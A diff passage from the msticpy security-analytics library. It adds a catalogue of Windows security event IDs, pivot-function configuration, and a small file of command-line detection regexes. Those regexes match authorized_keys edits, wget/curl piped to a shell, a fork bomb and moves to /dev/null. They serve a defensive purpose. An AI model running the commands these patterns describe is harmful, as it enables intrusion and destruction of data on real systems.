+		"description": "IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.",
+		"full_desc": "5468: IPsec Policy Agent polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5471,
+		"description": "IPsec Policy Agent loaded local storage IPsec policy on the computer.",
+		"full_desc": "5471: IPsec Policy Agent loaded local storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5472,
+		"description": "IPsec Policy Agent failed to load local storage IPsec policy on the computer.",
+		"full_desc": "5472: IPsec Policy Agent failed to load local storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5473,
+		"description": "IPsec Policy Agent loaded directory storage IPsec policy on the computer.",
+		"full_desc": "5473: IPsec Policy Agent loaded directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5474,
+		"description": "IPsec Policy Agent failed to load directory storage IPsec policy on the computer.",
+		"full_desc": "5474: IPsec Policy Agent failed to load directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Filtering Platform Policy Change",
+		"event_id": 5477,
+		"description": "IPsec Policy Agent failed to add quick mode filter.",
+		"full_desc": "5477: IPsec Policy Agent failed to add quick mode filter."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4944,
+		"description": "The following policy was active when the Windows Firewall started. ",
+		"full_desc": "4944: The following policy was active when the Windows Firewall started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4945,
+		"description": "A rule was listed when the Windows Firewall started. ",
+		"full_desc": "4945: A rule was listed when the Windows Firewall started. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4946,
+		"description": "A change was made to the Windows Firewall exception list. A rule was added.",
+		"full_desc": "4946: A change was made to the Windows Firewall exception list. A rule was added."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4947,
+		"description": "A change was made to the Windows Firewall exception list. A rule was modified.",
+		"full_desc": "4947: A change was made to the Windows Firewall exception list. A rule was modified."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4948,
+		"description": "A change was made to the Windows Firewall exception list. A rule was deleted.",
+		"full_desc": "4948: A change was made to the Windows Firewall exception list. A rule was deleted."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4949,
+		"description": "Windows Firewall settings were restored to the default values. ",
+		"full_desc": "4949: Windows Firewall settings were restored to the default values. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4950,
+		"description": "A Windows Firewall setting was changed.",
+		"full_desc": "4950: A Windows Firewall setting was changed."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4951,
+		"description": "Windows Firewall ignored a rule because its major version number is not recognized.",
+		"full_desc": "4951: Windows Firewall ignored a rule because its major version number is not recognized."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4952,
+		"description": "Windows Firewall ignored parts of a rule because its minor version number is not recognized. Other parts of the rule will be enforced.",
+		"full_desc": "4952: Windows Firewall ignored parts of a rule because its minor version number is not recognized. Other parts of the rule will be enforced."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4953,
+		"description": "Windows Firewall ignored a rule because it could not be parsed.",
+		"full_desc": "4953: Windows Firewall ignored a rule because it could not be parsed."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4954,
+		"description": "Group Policy settings for Windows Firewall were changed, and the new settings were applied.",
+		"full_desc": "4954: Group Policy settings for Windows Firewall were changed, and the new settings were applied."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4956,
+		"description": "Windows Firewall changed the active profile.",
+		"full_desc": "4956: Windows Firewall changed the active profile."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4957,
+		"description": "Windows Firewall did not apply the following rule: ",
+		"full_desc": "4957: Windows Firewall did not apply the following rule: "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 4958,
+		"description": "Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer: ",
+		"full_desc": "4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer: "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "MPSSVC Rule-Level Policy Change",
+		"event_id": 5050,
+		"description": "An attempt to programmatically disable Windows Firewall using a call to INetFwProfile.FirewallEnabled(FALSE) interface was rejected because this API is not supported on this version of Windows. This is most likely due to a program that is incompatible with this version of Windows. Please contact the program's manufacturer to make sure you have a compatible program version.",
+		"full_desc": "5050: An attempt to programmatically disable Windows Firewall using a call to INetFwProfile.FirewallEnabled(FALSE) interface was rejected because this API is not supported on this version of Windows. This is most likely due to a program that is incompatible with this version of Windows. Please contact the program's manufacturer to make sure you have a compatible program version."
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 4909,
+		"description": "The local policy settings for the TBS were changed. ",
+		"full_desc": "4909: The local policy settings for the TBS were changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 4910,
+		"description": "The group policy settings for the TBS were changed. ",
+		"full_desc": "4910: The group policy settings for the TBS were changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5063,
+		"description": "A cryptographic provider operation was attempted. ",
+		"full_desc": "5063: A cryptographic provider operation was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5064,
+		"description": "A cryptographic context operation was attempted. ",
+		"full_desc": "5064: A cryptographic context operation was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5065,
+		"description": "A cryptographic context modification was attempted. ",
+		"full_desc": "5065: A cryptographic context modification was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5066,
+		"description": "A cryptographic function operation was attempted. ",
+		"full_desc": "5066: A cryptographic function operation was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5067,
+		"description": "A cryptographic function modification was attempted. ",
+		"full_desc": "5067: A cryptographic function modification was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5068,
+		"description": "A cryptographic function provider operation was attempted. ",
+		"full_desc": "5068: A cryptographic function provider operation was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5069,
+		"description": "A cryptographic function property operation was attempted. ",
+		"full_desc": "5069: A cryptographic function property operation was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5070,
+		"description": "A cryptographic function property modification was attempted. ",
+		"full_desc": "5070: A cryptographic function property modification was attempted. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 5447,
+		"description": "A Windows Filtering Platform filter has been changed. ",
+		"full_desc": "5447: A Windows Filtering Platform filter has been changed. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 6144,
+		"description": "Security policy in the group policy objects has been applied successfully. ",
+		"full_desc": "6144: Security policy in the group policy objects has been applied successfully. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Other Policy Change Events",
+		"event_id": 6145,
+		"description": "One or more errors occurred while processing security policy in the group policy objects. ",
+		"full_desc": "6145: One or more errors occurred while processing security policy in the group policy objects. "
+	},
+	{
+		"category": "Policy Change",
+		"subcategory": "Special Multi-use",
+		"event_id": 4670,
+		"description": " Permissions on an object were changed. ",
+		"full_desc": "4670:  Permissions on an object were changed. "
+	},
+	{
+		"category": "Privilege Use",
+		"subcategory": "Sensitive Privilege Use / Non-Sensitive Privilege Use",
+		"event_id": 4672,
+		"description": "Special privileges assigned to new logon. ",
+		"full_desc": "4672: Special privileges assigned to new logon. "
+	},
+	{
+		"category": "Privilege Use",
+		"subcategory": "Sensitive Privilege Use / Non-Sensitive Privilege Use",
+		"event_id": 4673,
+		"description": "A privileged service was called. ",
+		"full_desc": "4673: A privileged service was called. "
+	},
+	{
+		"category": "Privilege Use",
+		"subcategory": "Sensitive Privilege Use / Non-Sensitive Privilege Use",
+		"event_id": 4674,
+		"description": "An operation was attempted on a privileged object. ",
+		"full_desc": "4674: An operation was attempted on a privileged object. "
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 4960,
+		"description": "IPsec dropped an inbound packet that failed an integrity check. If this problem persists, it could indicate a network issue or that packets are being modified in transit to this computer. Verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations. ",
+		"full_desc": "4960: IPsec dropped an inbound packet that failed an integrity check. If this problem persists, it could indicate a network issue or that packets are being modified in transit to this computer. Verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations. "
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 4961,
+		"description": "IPsec dropped an inbound packet that failed a replay check. If this problem persists, it could indicate a replay attack against this computer. ",
+		"full_desc": "4961: IPsec dropped an inbound packet that failed a replay check. If this problem persists, it could indicate a replay attack against this computer. "
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 4962,
+		"description": "IPsec dropped an inbound packet that failed a replay check. The inbound packet had too low a sequence number to ensure it was not a replay. ",
+		"full_desc": "4962: IPsec dropped an inbound packet that failed a replay check. The inbound packet had too low a sequence number to ensure it was not a replay. "
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 4963,
+		"description": "IPsec dropped an inbound clear text packet that should have been secured. If the remote computer is configured with a Request Outbound IPsec policy, this might be benign and expected. This can also be caused by the remote computer changing its IPsec policy without informing this computer. This could also be a spoofing attack attempt.",
+		"full_desc": "4963: IPsec dropped an inbound clear text packet that should have been secured. If the remote computer is configured with a Request Outbound IPsec policy, this might be benign and expected. This can also be caused by the remote computer changing its IPsec policy without informing this computer. This could also be a spoofing attack attempt."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 4965,
+		"description": "IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI). This is usually caused by malfunctioning hardware that is corrupting packets. If these errors persist, verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations. In that case, if connectivity is not impeded, then these events can be ignored.",
+		"full_desc": "4965: IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI). This is usually caused by malfunctioning hardware that is corrupting packets. If these errors persist, verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations. In that case, if connectivity is not impeded, then these events can be ignored."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5478,
+		"description": "The IPsec Policy Agent service was started.",
+		"full_desc": "5478: The IPsec Policy Agent service was started."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5479,
+		"description": "IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks. ",
+		"full_desc": "5479: IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks. "
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5480,
+		"description": "IPsec Policy Agent failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.",
+		"full_desc": "5480: IPsec Policy Agent failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5483,
+		"description": "The IPsec Policy Agent service failed to initialize its RPC server. The service could not be started.",
+		"full_desc": "5483: The IPsec Policy Agent service failed to initialize its RPC server. The service could not be started."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5484,
+		"description": "The IPsec Policy Agent service experienced a critical failure and has shut down. The shutdown of this service can put the computer at greater risk of network attack or expose the computer to potential security risks.",
+		"full_desc": "5484: The IPsec Policy Agent service experienced a critical failure and has shut down. The shutdown of this service can put the computer at greater risk of network attack or expose the computer to potential security risks."
+	},
+	{
+		"category": "System",
+		"subcategory": "IPsec Driver",
+		"event_id": 5485,
+		"description": "IPsec Policy Agent failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.",
+		"full_desc": "5485: IPsec Policy Agent failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5024,
+		"description": "The Windows Firewall service started successfully.",
+		"full_desc": "5024: The Windows Firewall service started successfully."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5025,
+		"description": "The Windows Firewall service was stopped.",
+		"full_desc": "5025: The Windows Firewall service was stopped."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5027,
+		"description": "The Windows Firewall service was unable to retrieve the security policy from the local storage. Windows Firewall will continue to enforce the current policy.",
+		"full_desc": "5027: The Windows Firewall service was unable to retrieve the security policy from the local storage. Windows Firewall will continue to enforce the current policy."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5028,
+		"description": "Windows Firewall was unable to parse the new security policy. Windows Firewall will continue to enforce the current policy.",
+		"full_desc": "5028: Windows Firewall was unable to parse the new security policy. Windows Firewall will continue to enforce the current policy."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5029,
+		"description": "The Windows Firewall service failed to initialize the driver. Windows Firewall will continue to enforce the current policy.",
+		"full_desc": "5029: The Windows Firewall service failed to initialize the driver. Windows Firewall will continue to enforce the current policy."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5030,
+		"description": "The Windows Firewall service failed to start.",
+		"full_desc": "5030: The Windows Firewall service failed to start."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5032,
+		"description": "Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network. ",
+		"full_desc": "5032: Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5033,
+		"description": "The Windows Firewall Driver started successfully.",
+		"full_desc": "5033: The Windows Firewall Driver started successfully."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5034,
+		"description": "The Windows Firewall Driver was stopped.",
+		"full_desc": "5034: The Windows Firewall Driver was stopped."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5035,
+		"description": "The Windows Firewall Driver failed to start. ",
+		"full_desc": "5035: The Windows Firewall Driver failed to start. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5037,
+		"description": "The Windows Firewall Driver detected a critical runtime error, terminating.",
+		"full_desc": "5037: The Windows Firewall Driver detected a critical runtime error, terminating."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5058,
+		"description": "Key file operation. ",
+		"full_desc": "5058: Key file operation. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 5059,
+		"description": "Key migration operation. ",
+		"full_desc": "5059: Key migration operation. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6400,
+		"description": "BranchCache: Received an incorrectly formatted response while discovering availability of content.",
+		"full_desc": "6400: BranchCache: Received an incorrectly formatted response while discovering availability of content."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6401,
+		"description": "BranchCache: Received invalid data from a peer. Data discarded.",
+		"full_desc": "6401: BranchCache: Received invalid data from a peer. Data discarded."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6403,
+		"description": "BranchCache: The hosted cache sent an incorrectly formatted response to the client.",
+		"full_desc": "6403: BranchCache: The hosted cache sent an incorrectly formatted response to the client."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6404,
+		"description": "BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate.",
+		"full_desc": "6404: BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6405,
+		"description": "BranchCache: %2 instance(s) of event id %1 occurred.",
+		"full_desc": "6405: BranchCache: %2 instance(s) of event id %1 occurred."
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6406,
+		"description": "%1 registered to Windows Firewall to control filtering for the following: %2",
+		"full_desc": "6406: %1 registered to Windows Firewall to control filtering for the following: %2"
+	},
+	{
+		"category": "System",
+		"subcategory": "Other System Events",
+		"event_id": 6407,
+		"description": "1%",
+		"full_desc": "6407: 1%"
+	},
+	{
+		"category": "System",
+		"subcategory": "Security State Change",
+		"event_id": 4608,
+		"description": "Windows is starting up. ",
+		"full_desc": "4608: Windows is starting up. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security State Change",
+		"event_id": 4616,
+		"description": "The system time was changed. ",
+		"full_desc": "4616: The system time was changed. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security State Change",
+		"event_id": 4621,
+		"description": "Administrator recovered system from CrashOnAuditFail. Users who are not administrators will now be allowed to log on. Some auditable activity might not have been recorded. ",
+		"full_desc": "4621: Administrator recovered system from CrashOnAuditFail. Users who are not administrators will now be allowed to log on. Some auditable activity might not have been recorded. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security System Extension",
+		"event_id": 4610,
+		"description": "An authentication package has been loaded by the Local Security Authority. ",
+		"full_desc": "4610: An authentication package has been loaded by the Local Security Authority. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security System Extension",
+		"event_id": 4611,
+		"description": "A trusted logon process has been registered with the Local Security Authority. ",
+		"full_desc": "4611: A trusted logon process has been registered with the Local Security Authority. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security System Extension",
+		"event_id": 4614,
+		"description": "A notification package has been loaded by the Security Account Manager. ",
+		"full_desc": "4614: A notification package has been loaded by the Security Account Manager. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security System Extension",
+		"event_id": 4622,
+		"description": "A security package has been loaded by the Local Security Authority. ",
+		"full_desc": "4622: A security package has been loaded by the Local Security Authority. "
+	},
+	{
+		"category": "System",
+		"subcategory": "Security System Extension",
+		"event_id": 4697,
+		"description": "A service was installed in the system. ",
+		"full_desc": "4697: A service was installed in the system. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 4612,
+		"description": "Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits. ",
+		"full_desc": "4612: Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 4615,
+		"description": "Invalid use of LPC port. ",
+		"full_desc": "4615: Invalid use of LPC port. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 4618,
+		"description": "A monitored security event pattern has occurred. ",
+		"full_desc": "4618: A monitored security event pattern has occurred. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 4816,
+		"description": "RPC detected an integrity violation while decrypting an incoming message. ",
+		"full_desc": "4816: RPC detected an integrity violation while decrypting an incoming message. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5038,
+		"description": "Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error. ",
+		"full_desc": "5038: Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5056,
+		"description": "A cryptographic self test was performed. ",
+		"full_desc": "5056: A cryptographic self test was performed. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5057,
+		"description": "A cryptographic primitive operation failed. ",
+		"full_desc": "5057: A cryptographic primitive operation failed. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5060,
+		"description": "Verification operation failed. ",
+		"full_desc": "5060: Verification operation failed. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5061,
+		"description": "Cryptographic operation. ",
+		"full_desc": "5061: Cryptographic operation. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 5062,
+		"description": "A kernel-mode cryptographic self test was performed. ",
+		"full_desc": "5062: A kernel-mode cryptographic self test was performed. "
+	},
+	{
+		"category": "System",
+		"subcategory": "System Integrity",
+		"event_id": 6281,
+		"description": "Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error",
+		"full_desc": "6281: Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error"
+	}
+]
\ No newline at end of file
diff --git a/msticpy/resources/cmd_line_rules.json b/msticpy/resources/cmd_line_rules.json
new file mode 100644
index 000000000..4fb2c3fc6
--- /dev/null
+++ b/msticpy/resources/cmd_line_rules.json
@@ -0,0 +1,9 @@
+{
+    "Syslog" : [
+        ".*authorized_keys.*",
+        ".*(wget|curl).*\\|?.*sh.*",
+        ".*(:\\(\\){:\\|:&};:).*",
+        ".*(mv.*\/dev\/null).*",
+        ".*\/bin\/bash.*"
+    ]
+}
\ No newline at end of file
diff --git a/msticpy/resources/mp_pivot_reg.yaml b/msticpy/resources/mp_pivot_reg.yaml
new file mode 100644
index 000000000..3c55e8b5b
--- /dev/null
+++ b/msticpy/resources/mp_pivot_reg.yaml
@@ -0,0 +1,217 @@
+pivot_providers:
+  # Documentation
+  # Add an entry with a unique (in the file) key - the actual value
+  # isn't used anywhere but should be descriptive
+  #
+  # new_pivot_func:
+  #   ## The src_module to import
+  #   src_module: msticpy.sectools.ip_utils
+  #
+  #   ## class to import and instantiate that contains the function/method
+  #   ## (not needed if the target function is a Python function)
+  #   class: ClassName
+  #
+  #   ## The name of the function to wrap
+  #   src_func_name: get_whois_df
+  #
+  #   ## rename the function - this is the name that will appear in the
+  #   ## pivot UI
+  #   func_new_name: whois
+  #
+  #   ## input type = dataframe, iterable, value
+  #   ## Note: this is the input type that the wrapped function expects, not
+  #   ## what the pivot function supports.
+  #   input_type: dataframe
+  #
+  #   ## dict of entity_map supported. Each entry should be the
+  #   ## name of the entity with the entity attribute to as input. E.g.
+  #   ## for a function to lookup whois info for an IP Address from an IpAddress
+  #   ## entity, the key will be 'IpAddress' and the value 'Address' (the
+  #   ## attribute of the entity containing the IP address value.)
+  #   entity_map:
+  #     IpAddress: Address
+  #     Host: HostName
+  #     Account: Name
+  #
+  #   ## The name that the function uses as input param for DataFrame
+  #   ## (only relevant if the target function takes DF input)
+  #   func_df_param_name: data
+  #
+  #   ## The name that function uses to identify the input column name
+  #   ## (only relevant if the target function takes DF input)
+  #   func_df_col_param_name: ip_column
+  #
+  #   ## The name of the column in the output DF to use as a key to join
+  #   ## to the input. This defaults to the the same column name
+  #   ## as func_df_col_param_name. Only relevant if the wrapped func
+  #   ## returns a DF
+  #   func_out_column_name: ip
+  #
+  #   ## static parameters (kwargs) passed to the target function
+  #   func_static_params:
+  #     whois_col: whois_result
+  #
+  #   ## kwarg to use as input. The name of the argument that the wrapped
+  #   ## function uses for its input value (only relevant for input_type ==
+  #   ## value)
+  #   func_input_value_arg: ip_address
+  #
+  who_is:
+    src_module: msticpy.sectools.ip_utils
+    src_func_name: get_whois_df
+    func_new_name: whois
+    input_type: dataframe
+    entity_map:
+      IpAddress: Address
+    func_df_param_name: data
+    func_df_col_param_name: ip_column
+    func_out_column_name: query
+    func_static_params:
+      all_columns: True
+      show_progress: False
+    func_input_value_arg: ip_address
+    create_shortcut: True
+  ip_type:
+    src_module: msticpy.sectools.ip_utils
+    src_func_name: get_ip_type
+    func_new_name: ip_type
+    input_type: value
+    can_iterate: True
+    entity_map:
+      IpAddress: Address
+    func_df_param_name: data
+    func_df_col_param_name: ip
+    func_out_column_name: ip
+    func_input_value_arg: ip_str
+    create_shortcut: True
+  b64_unpack:
+    src_module: msticpy.sectools.base64unpack
+    src_func_name: unpack_df
+    func_new_name: b64decode
+    input_type: dataframe
+    entity_map:
+      Process: CommandLine
+      Url: Url
+    func_df_param_name: data
+    func_df_col_param_name: column
+    func_out_column_name: original_string
+  ioc_extract:
+    src_module: msticpy.sectools.iocextract
+    src_class: IoCExtract
+    src_func_name: extract_df
+    func_new_name: extract_iocs
+    input_type: dataframe
+    entity_map:
+      Process: CommandLine
+      Url: Url
+    func_df_param_name: data
+    func_out_column_name: Input
+    func_df_col_param_name: columns
+  domain_valid_tld:
+    src_module: msticpy.sectools.domain_utils
+    src_class: DomainValidator
+    src_func_name: validate_tld
+    func_new_name: dns_validate_tld
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: host
+      Host: fqdn
+      Dns: DomainName
+    func_input_value_arg: url_domain
+  domain_valid_resolvable:
+    src_module: msticpy.sectools.domain_utils
+    src_class: DomainValidator
+    src_func_name: is_resolvable
+    func_new_name: dns_is_resolvable
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: host
+      Host: fqdn
+      Dns: DomainName
+    func_input_value_arg: url_domain
+    create_shortcut: True
+  domain_valid_in_abuse_list:
+    src_module: msticpy.sectools.domain_utils
+    src_class: DomainValidator
+    src_func_name: in_abuse_list
+    func_new_name: dns_in_abuse_list
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: host
+      Host: fqdn
+      Dns: DomainName
+    func_input_value_arg: url_domain
+  brow_shot:
+    src_module: msticpy.sectools.domain_utils
+    src_func_name: screenshot
+    func_new_name: url_screenshot
+    input_type: value
+    can_iterate: False
+    entity_map:
+      Url: Url
+    func_input_value_arg: url
+  domain_components:
+    src_module: msticpy.sectools.domain_utils
+    src_func_name: dns_components
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: host
+      Host: fqdn
+      Dns: DomainName
+    func_input_value_arg: domain
+  url_components:
+    src_module: msticpy.sectools.domain_utils
+    src_func_name: url_components
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: Url
+    func_input_value_arg: url
+  dns_resolve:
+    src_module: msticpy.sectools.domain_utils
+    src_func_name: dns_resolve
+    input_type: value
+    can_iterate: True
+    entity_map:
+      Url: Url
+      Host: fqdn
+      Dns: DomainName
+    func_input_value_arg: url_domain
+    create_shortcut: True
+  ip_rev_resolve:
+    src_module: msticpy.sectools.domain_utils
+    src_func_name: ip_rev_resolve
+    input_type: value
+    can_iterate: True
+    entity_map:
+      IpAddress: Address
+    func_input_value_arg: ip_address
+  geoip_maxmind:
+    src_module: msticpy.sectools.geoip
+    src_class: GeoLiteLookup
+    src_func_name: lookup_ips
+    func_new_name: geoloc
+    input_type: dataframe
+    entity_map:
+      IpAddress: Address
+    func_df_param_name: data
+    func_df_col_param_name: column
+    func_out_column_name: IpAddress
+    func_input_value_arg: ip_address
+    create_shortcut: True
+  geoip_ipstack:
+    src_module: msticpy.sectools.geoip
+    src_class: IPStackLookup
+    src_func_name: lookup_ips
+    func_new_name: geoloc_ips
+    input_type: dataframe
+    entity_map:
+      IpAddress: Address
+    func_df_param_name: data
+    func_df_col_param_name: column
+    func_out_column_name: IpAddress
+    func_input_value_arg: ip_address
diff --git a/msticpy/resources/mpconfig_defaults.yaml b/msticpy/resources/mpconfig_defaults.yaml
new file mode 100644
index 000000000..3e1840434
--- /dev/null
+++ b/msticpy/resources/mpconfig_defaults.yaml
@@ -0,0 +1,215 @@
+## For details of how to configure settings in this file, please
+## see https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html
+##
+## The definition for a leaf item is:
+##     type([options])
+##         type can be:
+##           "str" - text box
+##           "bool" - check box
+##           "int" - text box with numeric conversion
+##           "enum" - single select list
+##           "m_enum" - multi-select list
+##         options:
